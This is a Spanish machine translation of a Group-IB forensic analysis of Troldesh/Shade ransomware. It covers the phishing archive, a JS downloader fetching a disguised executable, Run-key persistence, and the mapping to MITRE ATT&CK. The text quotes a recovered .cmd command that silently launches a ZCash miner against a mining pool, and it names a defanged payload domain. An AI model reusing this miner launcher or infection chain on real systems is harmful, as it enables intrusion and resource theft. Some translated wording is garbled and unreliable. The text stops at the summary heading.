Si sigue las
noticias , probablemente sepa sobre un nuevo ataque a gran escala contra las compañías rusas del virus Troldesh ransomware (Shade), uno de los criptobloqueadores más populares entre los ciberdelincuentes. Solo en junio, Group-IB descubrió más de 1,100 correos electrónicos de phishing de Troldesh enviados en nombre de los empleados de las principales aerolíneas, concesionarios de automóviles y los medios de comunicación.
En este artículo, veremos los artefactos forenses que se pueden encontrar después de un ataque de Shade / Troldesh en los medios de un dispositivo comprometido, y también compararemos las tácticas y técnicas utilizadas por los atacantes con MITER ATT & CK.
Publicado por
Oleg Skulkin , especialista forense líder en Group-IB
Troldesh, también conocido como Shade, XTBL, Trojan.Encoder.858, Da Vinci, No_more_ransome, es un virus que encripta archivos en el dispositivo infectado de un usuario y requiere un rescate para restaurar el acceso a la información. Las campañas recientes con Troldesh han demostrado que ahora no solo cifra los archivos, sino también los mineros de criptomonedas y genera tráfico a los sitios web para aumentar el tráfico y los ingresos de la publicidad en línea.
La primera vez que los expertos del Grupo IB detectaron la actividad de Troldesh en 2015, notaron que el virus eludió con éxito las herramientas de protección antivirus. Los atacantes cambiaron regularmente el "empaquetador", un programa de empaquetador que reduce el tamaño del archivo y dificulta la detección y la reversión, debido a esto, los programas antivirus a menudo lo omiten. A finales de 2018, Troldesh se convirtió en uno de los virus más populares y entró con confianza entre los 3 primeros, junto con RTM y Pony. Los expertos de PaloAlto Networks informaron que Troldesh está trabajando no solo para fines rusos, entre los países afectados por el ransomware se encuentran Estados Unidos, Japón, India, Tailandia y Canadá.
Vector de infección inicial
Por lo general, "Troldesh / Shade" se distribuye a través de correos electrónicos de phishing con archivos adjuntos maliciosos, por ejemplo, archivos protegidos por contraseña que contienen archivos JS maliciosos, después de abrir, se descarga y se inicia el cryptolocker. ¿Qué significa esto? Sería una buena idea comenzar nuestro estudio analizando los rastros de la apertura de dichos archivos. ¿Dónde se pueden encontrar estos rastros? Bueno, por ejemplo, en Jump Lists:
Datos extraídos del archivo 5f7b5f1e01b83767.automaticDestinations-ms usando JLECmd
Entonces, vemos que el usuario abrió el archivo con el nombre "contraseña 11.rar sobre el pedido". Pero, ¿cómo entró en el sistema? El archivo se encuentra en el directorio de descargas, lo más probable es que se haya descargado de Internet. Echemos un vistazo al historial del navegador:
Datos extraídos del archivo WebCache01.dat usando Belkasoft Evidence Center
Como puede ver, el archivo se descargó usando el navegador web Microsoft Edge y se guardó en el directorio de Descargas. Además, justo antes de la descarga, el usuario visitó el sitio web de correo electrónico, por lo tanto, el archivo se recibió por correo electrónico.
Por lo tanto, estamos tratando con la técnica más común: T1193 - "Accesorio de pesca submarina".
Iniciar y evitar mecanismos de protección
Si miramos dentro del archivo, encontraremos un archivo JS con un nombre casi idéntico. Para que el malware se cargue y comience a funcionar, el usuario debe hacer doble clic en el archivo especificado. Después de eso, "wscript.exe" iniciará el archivo JS, que descargará el archivo malicioso de
mat.tradetoolsfx [.] Com y lo ejecutará. ¿Podemos encontrar rastros de esto en el disco? Por supuesto!
Veamos el archivo de captación previa wscript.exe, centrándonos en los archivos con los que interactuó:
<...>
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ TEMP \ 7ZO84024637 \ DETALLES DE PEDIDO A.JS
<...>
Entonces, tenemos dos archivos interesantes. En primer lugar, ahora sabemos el nombre del archivo JS que estaba en el archivo y, en segundo lugar, descubrimos el nombre del archivo que descargó. Es hora de averiguar de dónde fue descargado. Echemos un vistazo a WebCache01.dat nuevamente:
Datos recuperados de WebCache01.dat usando ESEDatabaseView
Si decodificamos el contenido del campo ResponseHeaders, obtenemos lo siguiente:
HTTP / 1.1 200 OK
Tipo de contenido: image / jpeg
Longitud del contenido: 1300656
ETag: "5ced19b6-13d8b0"
Seguridad de transporte estricta: edad máxima = 31536000;
De hecho, este no es un archivo JPG, sino un archivo ejecutable que descifra y lanza una instancia de Shade.
Entonces, ¿qué técnicas estamos tratando aquí? Scripting (T1064), Ejecución de usuario (T1204) y Masquerading (T1036).
Pin del sistema
"Shade" utiliza una forma bastante trivial de fijación al sistema: la clave de registro "Software \ Microsoft \ Windows \ CurrentVersion \ Run" (T1060). Ya sabemos que el archivo JS malicioso fue abierto por el usuario "0136", así que eche un vistazo al archivo correspondiente "NTUSER.DAT":
El mecanismo de bloqueo en el sistema detectado por Belkasoft Evidence Center
¡Pero eso no es todo! Más interesante aún:
El mecanismo de bloqueo en el sistema detectado por Belkasoft Evidence Center
Como puede ver en la ilustración, hay otra entrada interesante que apunta a C: \ ProgramData \ SysWOW64 \ leWRX7w.cmd. Veamos qué hay dentro de este archivo:
echo CreateObject ("Wscript.Shell"). Ejecute "" ^ & WScript.Arguments (0) ^ & "", 0, False> "% TEMP% / pxNXSB.vbs" && start / WAIT wscript.exe "% TEMP% /pxNXSB.vbs "" C: \ Users \ 0136 \ AppData \ Roaming \ SOFTWA ~ 1 \ NHEQMI ~ 1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.7B9D281 &% TEMP% \ pxNXSB.vbs "
Entonces, tenemos un archivo más. A juzgar por su contenido, los atacantes lo utilizan para extraer la criptomoneda ZCash. Por lo tanto, incluso si la víctima paga el rescate, los intrusos seguirán utilizando los recursos de su sistema.
Las consecuencias
En primer lugar, "Shade" es un cryptoclocker, por lo que lo primero que llama la atención es una gran cantidad de archivos con la extensión "CRYPTED000007", archivos "Read Me", así como fondos de pantalla "frescos" en su escritorio:
Se puede encontrar un archivo con esta imagen en el directorio C: \ Users \% username% \ AppData \ Roaming. ¿Con qué equipo estamos tratando? "Datos cifrados para impacto" (T1486).
Pero, como ya entendió, "Shade" no es un bloqueador de cifrado ordinario. Además del propio cryptoclocker, también encontramos un minero, lo que significa que vale la pena mencionar otra técnica: "Secuestro de recursos".
MITRE ATT Y CK
Nuestro análisis reveló una serie de tácticas y técnicas de los distribuidores de Shade, resumamos: